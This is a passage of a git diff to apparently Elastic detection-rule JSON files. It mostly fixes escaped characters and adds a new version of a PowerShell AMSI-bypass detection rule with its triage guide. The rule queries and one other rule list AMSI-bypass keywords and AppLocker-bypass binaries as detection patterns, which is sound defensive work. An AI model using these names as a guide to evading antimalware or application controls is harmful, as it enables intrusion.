\".SetValue(\")\n )\n", "references": [ "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell" @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_6.json b/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_6.json index 4698a6b530b..7b95ebce4ca 100644 --- a/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_6.json +++ b/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_6.json @@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Potential Antimalware Scan Interface Bypass via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Potential Antimalware Scan Interface Bypass via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nThis rule identifies scripts that contain methods and classes that can be abused to bypass AMSI.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Determine whether the script was executed and capture relevant information, such as arguments that reveal intent or are indicators of compromise (IoCs).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate commands and scripts executed after this activity was observed.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Antimalware Scan Interface Bypass via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nThis rule identifies scripts that contain methods and classes that can be abused to bypass AMSI.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Determine whether the script was executed and capture relevant information, such as arguments that reveal intent or are indicators of compromise (IoCs).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate commands and scripts executed after this activity was observed.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "event.category:\"process\" and host.os.type:windows and\n (powershell.file.script_block_text :\n (\"System.Management.Automation.AmsiUtils\" or\n\t\t\t\t amsiInitFailed or \n\t\t\t\t \"Invoke-AmsiBypass\" or \n\t\t\t\t \"Bypass.AMSI\" or \n\t\t\t\t \"amsi.dll\" or \n\t\t\t\t AntimalwareProvider or \n\t\t\t\t amsiSession or \n\t\t\t\t amsiContext or\n\t\t\t\t AmsiInitialize or \n\t\t\t\t unloadobfuscated or \n\t\t\t\t unloadsilent or \n\t\t\t\t AmsiX64 or \n\t\t\t\t AmsiX32 or \n\t\t\t\t FindAmsiFun) or\n powershell.file.script_block_text:(\"[System.Runtime.InteropServices.Marshal]::Copy\" and \"VirtualProtect\") or\n powershell.file.script_block_text:(\"[Ref].Assembly.GetType(('System.Management.Automation\" and \".SetValue(\")\n )\n and not powershell.file.script_block_text : (\n \"sentinelbreakpoints\" and \"Set-PSBreakpoint\" and \"PowerSploitIndicators\"\n )\n", "references": [ "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell" @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_7.json b/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_7.json new file mode 100644 index 00000000000..1451283121e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_7.json @@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of PowerShell script with keywords related to different Antimalware Scan Interface (AMSI) bypasses. An adversary may attempt first to disable AMSI before executing further malicious powershell scripts to evade detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Antimalware Scan Interface Bypass via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Potential Antimalware Scan Interface Bypass via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nThis rule identifies scripts that contain methods and classes that can be abused to bypass AMSI.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Determine whether the script was executed and capture relevant information, such as arguments that reveal intent or are indicators of compromise (IoCs).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate commands and scripts executed after this activity was observed.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:\"process\" and host.os.type:windows and\n (\n powershell.file.script_block_text : (\n \"System.Management.Automation.AmsiUtils\" or\n\t\t\tamsiInitFailed or \n\t\t\t\"Invoke-AmsiBypass\" or \n\t\t\t\"Bypass.AMSI\" or \n\t\t\t\"amsi.dll\" or \n\t\t\tAntimalwareProvider or \n\t\t\tamsiSession or \n\t\t\tamsiContext or\n\t\t\tAmsiInitialize or \n\t\t\tunloadobfuscated or \n\t\t\tunloadsilent or \n\t\t\tAmsiX64 or \n\t\t\tAmsiX32 or \n\t\t\tFindAmsiFun\n ) or\n powershell.file.script_block_text:(\"[System.Runtime.InteropServices.Marshal]::Copy\" and \"VirtualProtect\") or\n powershell.file.script_block_text:(\"[Ref].Assembly.GetType(('System.Management.Automation\" and \".SetValue(\")\n ) and\n not powershell.file.script_block_text : (\n \"sentinelbreakpoints\" and \"Set-PSBreakpoint\"\n )\n", + "references": [ + "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 73, + "rule_id": "1f0a69c0-3392-4adf-b7d5-6012fd292da8", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 7 + }, + "id": "1f0a69c0-3392-4adf-b7d5-6012fd292da8_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1f460f12-a3cf-4105-9ebb-f788cc63f365_1.json b/packages/security_detection_engine/kibana/security_rule/1f460f12-a3cf-4105-9ebb-f788cc63f365_1.json index e7314aca9fe..ae4ca0f1db4 100644 --- a/packages/security_detection_engine/kibana/security_rule/1f460f12-a3cf-4105-9ebb-f788cc63f365_1.json +++ b/packages/security_detection_engine/kibana/security_rule/1f460f12-a3cf-4105-9ebb-f788cc63f365_1.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1faec04b-d902-4f89-8aff-92cd9043c16f_101.json b/packages/security_detection_engine/kibana/security_rule/1faec04b-d902-4f89-8aff-92cd9043c16f_101.json index f9fe9a6ab97..20f1e1e8d43 100644 --- a/packages/security_detection_engine/kibana/security_rule/1faec04b-d902-4f89-8aff-92cd9043c16f_101.json +++ b/packages/security_detection_engine/kibana/security_rule/1faec04b-d902-4f89-8aff-92cd9043c16f_101.json @@ -29,7 +29,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1faec04b-d902-4f89-8aff-92cd9043c16f_102.json b/packages/security_detection_engine/kibana/security_rule/1faec04b-d902-4f89-8aff-92cd9043c16f_102.json index d0a2d96639e..f03e973e9d9 100644 --- a/packages/security_detection_engine/kibana/security_rule/1faec04b-d902-4f89-8aff-92cd9043c16f_102.json +++ b/packages/security_detection_engine/kibana/security_rule/1faec04b-d902-4f89-8aff-92cd9043c16f_102.json @@ -28,7 +28,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1faec04b-d902-4f89-8aff-92cd9043c16f_103.json b/packages/security_detection_engine/kibana/security_rule/1faec04b-d902-4f89-8aff-92cd9043c16f_103.json index c873a1733c1..99ac20f257c 100644 --- a/packages/security_detection_engine/kibana/security_rule/1faec04b-d902-4f89-8aff-92cd9043c16f_103.json +++ b/packages/security_detection_engine/kibana/security_rule/1faec04b-d902-4f89-8aff-92cd9043c16f_103.json @@ -38,7 +38,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_104.json b/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_104.json index 8d6c95066ea..75ee74d1735 100644 --- a/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_104.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Network Activity from a Windows System Binary", - "note": "## Triage and analysis\n\n### Investigating Unusual Network Activity from a Windows System Binary\n\nAttackers can abuse certain trusted developer utilities to proxy the execution of malicious payloads. Since these utilities are usually signed, they can bypass the security controls that were put in place to prevent or detect direct execution.\n\nThis rule identifies network connections established by trusted developer utilities, which can indicate abuse to execute payloads or process masquerading.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- As trusted developer utilities have dual-use purposes, alerts derived from this rule are not essentially malicious. If these utilities are contacting internal or known trusted domains, review their security and consider creating exceptions if the domain is safe.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Unusual Network Activity from a Windows System Binary\n\nAttackers can abuse certain trusted developer utilities to proxy the execution of malicious payloads. Since these utilities are usually signed, they can bypass the security controls that were put in place to prevent or detect direct execution.\n\nThis rule identifies network connections established by trusted developer utilities, which can indicate abuse to execute payloads or process masquerading.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- As trusted developer utilities have dual-use purposes, alerts derived from this rule are not essentially malicious. If these utilities are contacting internal or known trusted domains, review their security and consider creating exceptions if the domain is safe.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id with maxspan=5m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n\n /* known applocker bypasses */\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"MSBuild.exe\" or\n process.name : \"msdt.exe\" or\n process.name : \"mshta.exe\" or\n process.name : \"msiexec.exe\" or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n [network where\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"MSBuild.exe\" or\n process.name : \"msdt.exe\" or\n process.name : \"mshta.exe\" or\n (\n process.name : \"msiexec.exe\" and not\n dns.question.name : (\n \"ocsp.digicert.com\", \"ocsp.verisign.com\", \"ocsp.comodoca.com\", \"ocsp.entrust.net\", \"ocsp.usertrust.com\",\n \"ocsp.godaddy.com\", \"ocsp.camerfirma.com\", \"ocsp.globalsign.com\", \"ocsp.sectigo.com\", \"*.local\"\n )\n ) or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n", "related_integrations": [ { @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_105.json b/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_105.json index 13147c416de..d129ef2865e 100644 --- a/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_105.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Network Activity from a Windows System Binary", - "note": "## Triage and analysis\n\n### Investigating Unusual Network Activity from a Windows System Binary\n\nAttackers can abuse certain trusted developer utilities to proxy the execution of malicious payloads. Since these utilities are usually signed, they can bypass the security controls that were put in place to prevent or detect direct execution.\n\nThis rule identifies network connections established by trusted developer utilities, which can indicate abuse to execute payloads or process masquerading.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR 